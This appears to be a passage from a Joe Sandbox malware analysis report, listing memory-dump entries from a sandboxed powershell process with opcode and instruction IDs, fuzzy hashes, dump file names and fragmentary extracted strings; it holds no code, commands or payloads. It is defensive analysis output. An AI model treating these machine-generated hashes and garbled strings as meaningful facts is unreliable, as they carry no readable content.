                                                                  • Opcode Fuzzy Hash: 0b4f2d22327271a3009d3174190311fb0b0d3d22dd03e31f4acdb57619947a67
                                                                  • Instruction Fuzzy Hash: 2831C3B8B40204ABD714EF68C951FAE7BA39F94304F20C429EE056F795CFB5AC458B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $_q
                                                                  • API String ID: 0-238743419
                                                                  • Opcode ID: b3b8d33e0dae75f74e0a8e8b45641225b35fb9bb7115027103ef0eb92a4306b1
                                                                  • Instruction ID: eafaa4b11494321edca413ea7cf9a77412161c1fa9bda92868149ef41bfdb690
                                                                  • Opcode Fuzzy Hash: b3b8d33e0dae75f74e0a8e8b45641225b35fb9bb7115027103ef0eb92a4306b1
                                                                  • Instruction Fuzzy Hash: 84218BF5F001169BCB289A68C8006ADF7E9BF85618B20896BCA199B205DB35DC11C7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aba3b199e4f66ae0893e8d405c08b74bbf8cc874d48320c726cb25996842584a
                                                                  • Instruction ID: 3a78bcedcc039de1b5a21dc99dc28bec73544099ed984568cbd5df4527df9d9a
                                                                  • Opcode Fuzzy Hash: aba3b199e4f66ae0893e8d405c08b74bbf8cc874d48320c726cb25996842584a
                                                                  • Instruction Fuzzy Hash: EB02F875A012099FCB15CFA8D994EAEBBB2FF48310F248559E815AB365C731ED81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c8f690e95bc239ef54d3524b80103763e1ba81cf0d21ae712a817cf963c8db93
                                                                  • Instruction ID: 7f894a0c46337cf733baac87da1f364bcde1aaae9cc269e17e3ba7c0eb10ca87
                                                                  • Opcode Fuzzy Hash: c8f690e95bc239ef54d3524b80103763e1ba81cf0d21ae712a817cf963c8db93
                                                                  • Instruction Fuzzy Hash: 82020875A012099FCB15CF98D984AAEBBB2FF88310F248159F915AB365C731ED81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62c7f94e3d667d379231d2ec6de69571f30fe4487ad126b5e8c772af02a7ba29
                                                                  • Instruction ID: fae5dabb0520d33bbbbd286b63657057a996456e385e1ea5c9d7a0426138053d
                                                                  • Opcode Fuzzy Hash: 62c7f94e3d667d379231d2ec6de69571f30fe4487ad126b5e8c772af02a7ba29
                                                                  • Instruction Fuzzy Hash: 83F17C35A052489FCB15CFA8C594A9DBFB1FF49310F19819AE849AB366C731EC85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd25d2cbf0e2c1fb703022bd48fe5e2ea5ed96aaa03a6ae63b4094874d3110cb
                                                                  • Instruction ID: e4c40648b3ca1a7b7e4afcaa1ec58be75a86fa8cbdddbb0368a71e399ede8a12
                                                                  • Opcode Fuzzy Hash: fd25d2cbf0e2c1fb703022bd48fe5e2ea5ed96aaa03a6ae63b4094874d3110cb
                                                                  • Instruction Fuzzy Hash: 3602E675A05209AFCB15CF98C584EAEBBB2FF88310F258559E815AB365C731EC81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 239ef7cec7f10641129b99153c0b332764c2754c6eb6cc845174f40005fee1ad
                                                                  • Instruction ID: df6dbc3a66185b6de230d241a7a804c954baee373f2724506879e12b8296274a
                                                                  • Opcode Fuzzy Hash: 239ef7cec7f10641129b99153c0b332764c2754c6eb6cc845174f40005fee1ad
                                                                  • Instruction Fuzzy Hash: 2FD13734A012499FCB15CFA8D584A9DBBF2EF89314F2581A9E845AB365C731FC45CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4101ff4e8cae47ddfc68c8d3dd3c3b52af66cc25762b94f3031d56b29c4210b6
                                                                  • Instruction ID: ab63fad26bc1ec58c1298e0143ede04e4ceaa79f375d339af01e9c95bbbe6237
                                                                  • Opcode Fuzzy Hash: 4101ff4e8cae47ddfc68c8d3dd3c3b52af66cc25762b94f3031d56b29c4210b6
                                                                  • Instruction Fuzzy Hash: 14C18935A002089FCB14DFA5D944AADBBF2FF84314F1585A9E406AF264DB74FD99CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ef113983deee78fe976faebf1884867587196b14338f94c5ea6f1e319d534b6
                                                                  • Instruction ID: 6af76c22ebbef97965f93a5124558565e59707e72d7704fc03d8af5a31b8c6be
                                                                  • Opcode Fuzzy Hash: 6ef113983deee78fe976faebf1884867587196b14338f94c5ea6f1e319d534b6
                                                                  • Instruction Fuzzy Hash: D181A535B002058FDB14DF68D944AAEB7F6FF88310F148569E8099B369DB35DD06CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2645c01fe255deb83bd140bffa84c93c8744a5cc786d6e038d2fcadc6feafa56
                                                                  • Instruction ID: f186d28909ebcb8730fbd70cf809f6fadd5a6831ab991ff4c22b11930508ded1
                                                                  • Opcode Fuzzy Hash: 2645c01fe255deb83bd140bffa84c93c8744a5cc786d6e038d2fcadc6feafa56
                                                                  • Instruction Fuzzy Hash: 6C717830A002098FCB14DF68C894A9EFBF2AF89314F14C56AD4559B665DB71FC46CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a1681c8af12ba317372d777de0842afba72b8d49cb9984f31854f46ca3e3ad2
                                                                  • Instruction ID: c8aa4681ce86ced52bafbc8660d7078c2663c43545d10bad32876c2dea5b15d6
                                                                  • Opcode Fuzzy Hash: 6a1681c8af12ba317372d777de0842afba72b8d49cb9984f31854f46ca3e3ad2
                                                                  • Instruction Fuzzy Hash: 3D715C74A00209DFDB14DFA5D444BADBBF6BF88308F148469D402AB6A4DB75FD8ACB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd6d79a6a9e7412a50e10b3061a82bf3d9de61ed545a93e9be605a54abd58fec
                                                                  • Instruction ID: 040a03818fe7cdbf4ecc5e1ebb303693948176267b35a2b36154f4dc94cb0291
                                                                  • Opcode Fuzzy Hash: dd6d79a6a9e7412a50e10b3061a82bf3d9de61ed545a93e9be605a54abd58fec
                                                                  • Instruction Fuzzy Hash: 7641596685F3E06FDB03A738997108A3FB09E43228B1A01D7C0D0CF4BBE559494DC7AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75e824144080a147d1a21b6d2b8801234c6284107a9baf46f5ca1ad248b3e82a
                                                                  • Instruction ID: f86765a0397a199775ef33816dcfd2362f44f237119878b7a438582bc2279a8e
                                                                  • Opcode Fuzzy Hash: 75e824144080a147d1a21b6d2b8801234c6284107a9baf46f5ca1ad248b3e82a
                                                                  • Instruction Fuzzy Hash: 1F513D34A006099FCB15CF98C895DAEBBB2FF48310B248559E926A73A4D735EC42CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae372d32d82acda5155de7b248897a75fb51024e08cf88ab5d71fa7f9b0d3a2e
                                                                  • Instruction ID: c6f8ce8b02d2abe179f36c43160d2d18ebf2f32514bffa9a23c33ba065dc218b
                                                                  • Opcode Fuzzy Hash: ae372d32d82acda5155de7b248897a75fb51024e08cf88ab5d71fa7f9b0d3a2e
                                                                  • Instruction Fuzzy Hash: 5E511D74A106099FCB15CF98C495DAEBBF2FF88314B248658E926A73A4D731EC52CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7ff1ce070efe327ed8d56926c936bc32ebf7c2b4b3e9cd58bc09180645ba927
                                                                  • Instruction ID: 3d42bf7364f7d25ae2cab855e9d47e3d1ccc2c720be9d73839eb6d72bf42f130
                                                                  • Opcode Fuzzy Hash: a7ff1ce070efe327ed8d56926c936bc32ebf7c2b4b3e9cd58bc09180645ba927
                                                                  • Instruction Fuzzy Hash: 1441672280E3D15FC717977898A14CA7FB09D4726070B01E7D4C6CF1B3E56D084ACBA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22afe06e28a11ce37c1bd2be32d6973cb79e8e35ed5a971d41126b8451d51e15
                                                                  • Instruction ID: e2996a7e98b46657511d46eb419d4fb979c78acc72305f754fe88273787ffe5d
                                                                  • Opcode Fuzzy Hash: 22afe06e28a11ce37c1bd2be32d6973cb79e8e35ed5a971d41126b8451d51e15
                                                                  • Instruction Fuzzy Hash: EF417B70A002189FDB15DFA5D8446EDFBF2BF88314F148569D002AF6A4DBB1AD89CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 217b83aa25145f9f3c699b03afa5c14396afc2e6f8c5faebf6c30a3514918d14
                                                                  • Instruction ID: 9af808e6d735c6c4b5790845bb5e2817236b7ce2d00f4ee6c2a68db4e0b66b64
                                                                  • Opcode Fuzzy Hash: 217b83aa25145f9f3c699b03afa5c14396afc2e6f8c5faebf6c30a3514918d14
                                                                  • Instruction Fuzzy Hash: A7414234A002089FDB18DF79C9547AEBAF7AF88310F14C469E805AF759DF759C458B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86a01e155e7a2a090a43d14d781665d6cf56a81b4359000dade10f68ca48ccd4
                                                                  • Instruction ID: c3133ae312e03b02ac91d448c00452bcbcba1872828fb428f03cda33af609757
                                                                  • Opcode Fuzzy Hash: 86a01e155e7a2a090a43d14d781665d6cf56a81b4359000dade10f68ca48ccd4
                                                                  • Instruction Fuzzy Hash: 9941E574A052099FCB15CF9CC984AAEBBB2BF4C320B248659E916E7364D331EC41CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a68211131e8b856261fa072fed8183c48a5a336051ae7dc196947c6555c7843
                                                                  • Instruction ID: c829ecb7d0d7b38b7bc00a840868bb933309a90ba43d8e657afecc965a5a7d72
                                                                  • Opcode Fuzzy Hash: 0a68211131e8b856261fa072fed8183c48a5a336051ae7dc196947c6555c7843
                                                                  • Instruction Fuzzy Hash: 8C51A934A01209EFDB05CF98D584A9DBBF2FF48314F248559E809AB365C776AD85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 55ef65631fd963468195d973877d9e09287a1200ec8f20a1e41418e9a41a2fab
                                                                  • Instruction ID: 8a656c3af575967d2256547697c73b0f8ae481b2755748330572c4efe4ae7bfe
                                                                  • Opcode Fuzzy Hash: 55ef65631fd963468195d973877d9e09287a1200ec8f20a1e41418e9a41a2fab
                                                                  • Instruction Fuzzy Hash: FE410974A015159FCB05CF5CC994AAEBBB1FF48314B248659E916EB3A5C335EC41CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d1486b4b5170ad31c0963ecb288f4462d4de37def6db814f552799e06bed504
                                                                  • Instruction ID: 0555f7069bf5ff0dcc29ebff8f10b36edc8403804fa76b393e7126622d64d0ec
                                                                  • Opcode Fuzzy Hash: 1d1486b4b5170ad31c0963ecb288f4462d4de37def6db814f552799e06bed504
                                                                  • Instruction Fuzzy Hash: 80411974A045099FCB05CF98C884AAEBBF2FF4C314B248659E916A73A4D735EC51CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b18d9183210cf2b745fbeeabcf27ff0cece59c3c0643f5eace42fc3c529dcd5
                                                                  • Instruction ID: ce7ff55e5de3c4decd7fab9d2e5e5a3456b8f036665fefabc2973e6196242d1e
                                                                  • Opcode Fuzzy Hash: 0b18d9183210cf2b745fbeeabcf27ff0cece59c3c0643f5eace42fc3c529dcd5
                                                                  • Instruction Fuzzy Hash: 1E419E34A052459FCB15CF58C9949A9FFF1FF4A310B258299D45AEB2A2C336EC42CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b40c9721cffbddd3ac90cf9e9c8663ebc73feed224203bd8b3aa84226e780a
                                                                  • Instruction ID: 4b6b00ce2e3dee76b89fef1119e1984dda71e794db806484b3976046c98f0bee
                                                                  • Opcode Fuzzy Hash: 01b40c9721cffbddd3ac90cf9e9c8663ebc73feed224203bd8b3aa84226e780a
                                                                  • Instruction Fuzzy Hash: 34318CF67102169BCB646A744912B7FB7968BD1318F00883ADB01CB681EF79C948C3A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e054739319c28763a78ebbfbabe85256c40b02ae599caba131dbcc666765af62
                                                                  • Instruction ID: 12ca47358de394aeafd4c9863f8848b3ad7a096b63b03536f947418c63ddc6a2
                                                                  • Opcode Fuzzy Hash: e054739319c28763a78ebbfbabe85256c40b02ae599caba131dbcc666765af62
                                                                  • Instruction Fuzzy Hash: AC311774A006099FCB18CF98C5849AAFBF1FF49310B258699D819AB761C332EC81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ae67b5791b417a1246816482afbf896565fd50e30a27c94aff23ccdab46fd04
                                                                  • Instruction ID: 2bb3fe475d581e6855a41f2dbb93d253ba34015eda7b4faa61d8e9d349b7cde8
                                                                  • Opcode Fuzzy Hash: 4ae67b5791b417a1246816482afbf896565fd50e30a27c94aff23ccdab46fd04
                                                                  • Instruction Fuzzy Hash: 82312974A002059FCB15CF98C590AA9FBF1FF4D310B258699D859AB765C332EC81CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbe4da16741baeaafef033e04a2341802e37f80843e46de3a30f066440277d8e
                                                                  • Instruction ID: f58c7210905623c60c26d9a2b42f9cde61964403985f5eac5eac158eacd9da0f
                                                                  • Opcode Fuzzy Hash: dbe4da16741baeaafef033e04a2341802e37f80843e46de3a30f066440277d8e
                                                                  • Instruction Fuzzy Hash: DF21AEB4A053498FCB02CFA8D9909AABFF1FF8A310B15419AD445DB3A2C735EC45CB61
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ffe97c865eaf862fa7c683ee3fe69f0e428bf276cf04c483aa0ba331bbd531f3
                                                                  • Instruction ID: fe8c57adbbb6d67fede43d938821ddb220f1a7c09bf01f26e89bf4dc2902f974
                                                                  • Opcode Fuzzy Hash: ffe97c865eaf862fa7c683ee3fe69f0e428bf276cf04c483aa0ba331bbd531f3
                                                                  • Instruction Fuzzy Hash: 691155B1D002088FDB20DFAAC8457EFFFF4AF88324F24841AD419A7240CB75A944CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837522999.0000000009350000.00000040.00000800.00020000.00000000.sdmp, Offset: 09350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9350000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f1dd602627d9ec3c997337b02816cd3eec758fb595fb20e553ad45e2936d968
                                                                  • Instruction ID: 5afd5c5c901efdb34836b833beee6f0f607d568d1bc38be093ff5fac04683213
                                                                  • Opcode Fuzzy Hash: 9f1dd602627d9ec3c997337b02816cd3eec758fb595fb20e553ad45e2936d968
                                                                  • Instruction Fuzzy Hash: 6D11EC34A00209EFCB05CF98D484E9DBBB2FF48314F288558F805AB365C771A881CF40
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8584432e27a9638fa126a18c4b9b1796d714e328b5b1849ffcc035121671471
                                                                  • Instruction ID: 7f1b4d791a5e3ae3b66a545b57a87cb5b2b6990f3a974c0e1581e2edbd806d82
                                                                  • Opcode Fuzzy Hash: d8584432e27a9638fa126a18c4b9b1796d714e328b5b1849ffcc035121671471
                                                                  • Instruction Fuzzy Hash: 0CF030397105208B8749EB68E05846D77E7EFC8632314806EF907C7359CF75DD0287A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d530e9dd1a9435ecbf79ee8ea883ccadb0aded7f91fdeaaf930d3f9bb426c81
                                                                  • Instruction ID: bcf08766b1861e9ec3fb0499d2e1fec42636ba99ed9ad285ecf15b0243e00f3b
                                                                  • Opcode Fuzzy Hash: 3d530e9dd1a9435ecbf79ee8ea883ccadb0aded7f91fdeaaf930d3f9bb426c81
                                                                  • Instruction Fuzzy Hash: 82F0DA35A001099FCB15CF9DD990AEEF7B1FF88324F208199E515A73A1C736AC52CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                  • Instruction ID: da72281bcc15f7e62401a62dd255eacbfc0f4f1b33f8dbc18269b16fbe7b62d0
                                                                  • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                  • Instruction Fuzzy Hash: 1FD06270D042099FC780DFADC94156DFBF4EB59210F50C5AE8919D7301F73256128BD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$84tl$84tl$84tl$84tl$tP_q$tP_q$tP_q$tP_q$$_q$(eq$(eq$(eq$(eq
                                                                  • API String ID: 0-1258516865
                                                                  • Opcode ID: b42e9778c033374e8d9e1c8bdd1c6849306a5debdb1f1b8f2cec3601b6ac65be
                                                                  • Instruction ID: b524225063a916ce8c96eedeeb65395973a3898e2d8da105c3c56b64106aa16e
                                                                  • Opcode Fuzzy Hash: b42e9778c033374e8d9e1c8bdd1c6849306a5debdb1f1b8f2cec3601b6ac65be
                                                                  • Instruction Fuzzy Hash: 10A13BB1B40206DFCB248F68C95466ABBE7EF84319F148869EE059F394DB71DD40CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$84tl$84tl$d%eq$d%eq$d%eq$d%eq$tP_q$tP_q$|J($|J($$_q
                                                                  • API String ID: 0-271360222
                                                                  • Opcode ID: 0d2fe20b12d357f136edd50416fbd8de033d4ff6467a27714f9b878d72591503
                                                                  • Instruction ID: b87a92431ea61075013747e8e09c027dde6968854e9c059b5cbc86bc46b1084f
                                                                  • Opcode Fuzzy Hash: 0d2fe20b12d357f136edd50416fbd8de033d4ff6467a27714f9b878d72591503
                                                                  • Instruction Fuzzy Hash: 3B5107B5B00216DFCB24DF68C950ABAB7E7EB88718F148469DA019B394DB31DC41C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$tP_q$tP_q$#fk$$_q$$_q$$_q$ll$ll
                                                                  • API String ID: 0-225593086
                                                                  • Opcode ID: baa7f8e8342d33571b16354549e60cd1e17cdb3460eac93511cf7776715c6bc4
                                                                  • Instruction ID: ba3aec52be74f24405db595ed2272b921a31a2bb68165316514193d3176e0dec
                                                                  • Opcode Fuzzy Hash: baa7f8e8342d33571b16354549e60cd1e17cdb3460eac93511cf7776715c6bc4
                                                                  • Instruction Fuzzy Hash: A8A15AB27053169FCB158A7D841067ABBEDAFC2719F28846BDA45CB252DB31CC41C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$84tl$84tl$tP_q$tP_q$$_q$$_q$$_q
                                                                  • API String ID: 0-930631841
                                                                  • Opcode ID: 3c6c39002f16b396a26483de272bbb73d528ff96e16168b4191640499b9f9ebe
                                                                  • Instruction ID: 19ab38f5bce8585c58bcc4c09edef130dd41b8b6cdda04f3281758d022998c56
                                                                  • Opcode Fuzzy Hash: 3c6c39002f16b396a26483de272bbb73d528ff96e16168b4191640499b9f9ebe
                                                                  • Instruction Fuzzy Hash: 4BD1C335700208AFCB14CF68C940A6ABBF6EB88351F15C469F916DB3A8DB71DD45CBA1
                                                                  Strings
